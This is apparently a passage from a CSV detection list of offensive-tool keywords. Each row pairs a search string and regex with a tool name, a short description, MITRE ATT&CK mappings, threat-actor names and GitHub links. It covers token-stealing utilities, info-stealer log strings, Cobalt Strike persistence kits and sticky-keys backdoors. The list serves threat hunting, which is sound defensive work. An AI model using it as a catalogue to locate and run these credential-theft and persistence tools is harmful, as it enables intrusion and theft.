"*static_syscalls_dump*",".{0,1000}static_syscalls_dump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60370"
"*statistically-likely-usernames*",".{0,1000}statistically\-likely\-usernames.{0,1000}","offensive_tool_keyword","statistically-likely-usernames","This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/insidetrust/statistically-likely-usernames","1","1","N/A","N/A","N/A","10","1064","149","2022-08-31T20:27:53Z","2016-02-14T23:24:39Z","60371"
"*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","60372"
"*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","60373"
"*StayKit.exe*",".{0,1000}StayKit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","60374"
"*StayKit.git*",".{0,1000}StayKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","60375"
"*Steal_Pipe_Token /PipeName*",".{0,1000}Steal_Pipe_Token\s\/PipeName.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","60378"
"*steal_token *",".{0,1000}steal_token\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","60379"
"*steal_token(*",".{0,1000}steal_token\(.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","60380"
"*steal_token.py*",".{0,1000}steal_token\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","60381"
"*steal_token_access_mask*",".{0,1000}steal_token_access_mask.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","60382"
"*steal-cert.py*",".{0,1000}steal\-cert\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","60383"
"*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*",".{0,1000}StealCookie\-28050355\-D9DF\-4CE7\-BFBC\-4F7DDE890C2A\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","60384"
"*StealDhcpSecrets.c*",".{0,1000}StealDhcpSecrets\.c.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","60385"
"*StealDhcpSecrets.exe*",".{0,1000}StealDhcpSecrets\.exe.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","60386"
"*Stealer finished its work*",".{0,1000}Stealer\sfinished\sits\swork.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60387"
"*Stealer.exe *",".{0,1000}Stealer\.exe\s.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","60388"
"*Stealing browser data*",".{0,1000}Stealing\sbrowser\sdata.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60389"
"*Stealing crypto wallets*",".{0,1000}Stealing\scrypto\swallets.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60390"
"*Stealing discord tokens*",".{0,1000}Stealing\sdiscord\stokens.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60391"
"*Stealing Epic session*",".{0,1000}Stealing\sEpic\ssession.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60392"
"*Stealing Growtopia session*",".{0,1000}Stealing\sGrowtopia\ssession.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60393"
"*Stealing Minecraft related files*",".{0,1000}Stealing\sMinecraft\srelated\sfiles.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60394"
"*Stealing Roblox cookies*",".{0,1000}Stealing\sRoblox\scookies.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60395"
"*Stealing Steam session*",".{0,1000}Stealing\sSteam\ssession.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60396"
"*Stealing system information*",".{0,1000}Stealing\ssystem\sinformation.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60397"
"*Stealing telegram sessions*",".{0,1000}Stealing\stelegram\ssessions.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60398"
"*Stealing Uplay session*",".{0,1000}Stealing\sUplay\ssession.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60399"
"*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*",".{0,1000}StealPowerAutomateToken\-C4E7B7DA\-54E4\-49AB\-B634\-FCCD77C65025\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","60400"
"*stealthhackerpro@yahoo.com*",".{0,1000}stealthhackerpro\@yahoo\.com.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#email","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","60401"
"*StealTokenClient.exe *",".{0,1000}StealTokenClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","60402"
"*StealTokenClient\StealTokenClient.cs*",".{0,1000}StealTokenClient\\StealTokenClient\.cs.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","60403"
"*StealTokenDrv_x64.sys*",".{0,1000}StealTokenDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","60404"
"*Sticky Key backdoor has been removed*",".{0,1000}Sticky\sKey\sbackdoor\shas\sbeen\sremoved.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","60405"
"*Sticky Keys backdoor added.*",".{0,1000}Sticky\sKeys\sbackdoor\sadded\..{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","60406"
"*Sticky Keys backdoor does not exist, let's add it*",".{0,1000}Sticky\sKeys\sbackdoor\sdoes\snot\sexist,\slet\'s\sadd\sit.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","60407"
"*Sticky-Keys-Slayer*",".{0,1000}Sticky\-Keys\-Slayer.{0,1000}","offensive_tool_keyword","Sticky-Keys-Slayer","Scans for accessibility tools backdoors via RDP","T1078 - T1015 - T1203","TA0003 - TA0007 - TA0008","N/A","N/A","Reconnaissance","https://github.com/linuz/Sticky-Keys-Slayer","1","1","N/A","N/A","N/A","4","340","71","2018-03-16T15:59:41Z","2016-08-06T18:55:28Z","60408"
"*StickyNotesExtract.exe*",".{0,1000}StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","60409"
"*Stifle.exe add /object:*",".{0,1000}Stifle\.exe\sadd\s\/object\:.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","N/A","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","60410"
"*Stifle.exe clear *",".{0,1000}Stifle\.exe\sclear\s.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","N/A","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","60411"
"*stinger_client -*",".{0,1000}stinger_client\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","0","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","60412"
